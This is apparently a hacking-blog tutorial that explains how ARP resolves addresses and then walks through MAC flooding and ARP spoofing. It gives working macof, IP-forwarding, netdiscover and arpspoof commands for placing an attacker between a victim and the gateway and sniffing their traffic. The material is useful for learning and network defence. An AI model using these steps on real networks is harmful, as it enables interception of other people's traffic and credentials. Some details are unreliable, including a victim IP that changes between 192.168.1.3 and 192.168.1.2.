What is ARP Spoofing or ARP Poisoning ? |How to perform ARP Spoofing |ARP Spoofing attack
Hey Hackers!!
Today we will discuss about What is ARP Spoofing/poisoning ?what is ARP protocol ? how it works ? .
Before learning ARP and its attacks ,i will recommend you to learn about network sniffing .
Once you are done with Network sniffing and its basic working we can begin with ARP basics .
What is ARP ?
ARP stands for Address Resolution Protocol .It runs upon the Link Layer (Layer 2) of the OSI model .Its purpose is to resolve an IP address into a MAC address .
Any piece of hardware that connects to the internet has a unique MAC address associated with it .
How ARP works ?
So let’s imagine the scenario shown in above image, where on a switch-based network, “Laptop -1 (on the bottom )” with an IP address 192.168.1.3 would like to communicate with “Laptop-2(on the top)” with an IP address 192.168.1.4.Now, in order to communicate on a LAN. Laptop -1 will require the MAC address of Laptop-2.
Laptop-1 will look inside the ARP cache and see if the entry for the Laptop-2’s IP address is present inside the ARP table .If its not present , Laptop-1 will send an ARP broadcast packet to every device on the network asking “Who has Laptop-2’s IP address”.
Once Laptop-2 receives the ARP request , it will send and ARP reply telling Laptop-1 “I am Laptop-2 and here is my MAC address”.The MAC address would be then saved inside the ARP table .An ARP cache contains a list of IP and MAC address of every host we communicated with.
Now, let’s discuss the Attacks that you can perform using ARP protocol .
ARP attack
Note:It doesn't matter whether the network is HUB based or Switch based you can perform ARP Spoofing on both
There are two types of attacks that can be performed with ARP:
- MAC Flooding .
- ARP Poisoning/Spoofing .
MAC Flooding
We will discuss MAC Flooding first as it is easier. The idea behind this attack is to send huge amount of ARP replies to a switch ,thereby overloading the cam table of the switch .Once the switch overloads, it goes into hub mode,meaning that it will forward the traffic to every single computer on the network.
NOTE:This attack does not work on every switch ;lots of newer switches have built-in protection against an attack.
Macof is a part of dsniff tools , which we will use to fill the cam table .It fills the cam table in less than a minute or so , since it sends a huge number of MAC entries about 155,000 per minute (just to be specific).
Macof is preinstalled in linux just type the following command to run Macof against target:
macof -i eth0 -s 192.168.1.3 -d 192.168.1.5Let’s review the above command :
macof is used to invoke the tool itself "-i" switch is used to select the network interface "-s" switch is used to select the source (i.e attackers IP address) "-d" switch is used to select the destination (i.e Targets IP address).
ARP Poisoning /Spoofing
ARP poisoning is a very popular attack and can be used to get in the middle of a communication.This could be achieved by sending fake “ARP replies“as discussed earlier ,the ARP protocol would always trust that the reply is coming from the right device .Due to this flaw in its design ,it can in no way verify that the ARP reply was sent from the correct device .
In the above image, the attacker is telling Alan’s box that he has the IP that corresponds to Brian’s box and vice versa. By doing this the attacker receives all network traffic going between Alan and Brian. Once the attacker has ARP Spoofed his way between two nodes he can sniff the connection. By ARP Spoofing between a computer and the LAN’s gateway an attacker can see all the traffic the computer is sending out and receiving.
ARP Spoofing Attack
Before we perform the attack ,we need to enable IP forwarding so that the traffic could be forwarded to the destination .In order to do so type the following command in terminal :
echo 1 > /proc/sys/net/ipv4/ip_forward“1” ,means IP forward is enable and “0” means disabled.
Now we have enabled the IP forwarding now we need to gather the following information.
- Attacker’s IP.
- Victim’s IP.
- Default gateway.
You can get all the above mentioned information by typing a single command on linux terminal:
netdiscoverAs you can see from the above output ,i have 5 devices on a network in which “192.168.1.1” is my default Gateway “192.168.1.3″ is the Victims IP address “192.168.1.4” is the attackers IP address.
So what we will do is to tell the default gateway that the victim’s IP address is associated with our MAC address and vice versa.
Let’s try ARP Spoof to do this .The tool which we will be using is arpspoof it is built-in to linux .
the basic syntax for arpspoof is as follows:
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1In this case my interface is eth0 and my target 192.168.1.1 (default gateway) and 192.168.1.2(victim).
Now for the second time we will just switch the IP’s ,because we want to be in middle and we need to send ARP replies both ways .
arpspoof -i eth0 -t 192.168.1.1 192.168.1.3Let’s take a look at the ARP cache of the victim’s machine now ,We will find our MAC address associated with both IP address (default gateway and victim).
So we have successfully poisoned the ARP cache , now we can run couple of sniffers that capture the traffic such as dniff , driftnet , wireshark etc.
Keep Coming for more!!!
Thank you